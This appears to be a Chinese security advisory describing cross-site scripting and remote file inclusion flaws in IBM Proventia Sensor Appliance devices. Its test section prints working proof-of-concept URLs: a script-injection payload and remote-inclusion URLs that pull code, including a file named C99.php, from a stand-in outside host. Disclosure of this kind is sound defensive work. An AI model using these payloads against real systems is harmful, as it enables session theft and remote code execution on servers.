内容安全 
大数据安全 
网络安全 
更多产品 
IBM Proventia Sensor Appliance多个输入验证漏洞
信息来源:Alex Hernandez (al3xhernandez@ureach.com) 发表日期:2013-04-15 15:26:00
IBM Proventia Sensor Appliance是网络入侵感应器设备。
IBM Proventia Sensor Appliance CX5108、GX5008在实现上存在多个输入验证漏洞,包括远程文件包含漏洞和跨站脚本漏洞,攻击者可利用这些漏洞窃取cookie身份验证凭证、查看文件并执行任意服务器端脚本代码。
BUGTRAQ-ID:24864
受影响系统:
IBM Proventia Sensor Appliance GX5108
IBM Proventia Sensor Appliance GX5008
测试方法:
警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!跨站脚本:
https://www.example.com/alert.php?reminder=-->//"><script>alert(/XSS_vulnerability_proventia_s0x by Alex Hernandez/);</script>
远程文件包含:
http://www.example.com/index.php?title=http://www.example2.com/C99.php?archive.php
https://www.example.com/main.php?page=https://www.example2.com
解决办法:
厂商补丁:
IBM
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.ibm.com/support/fixcentral/
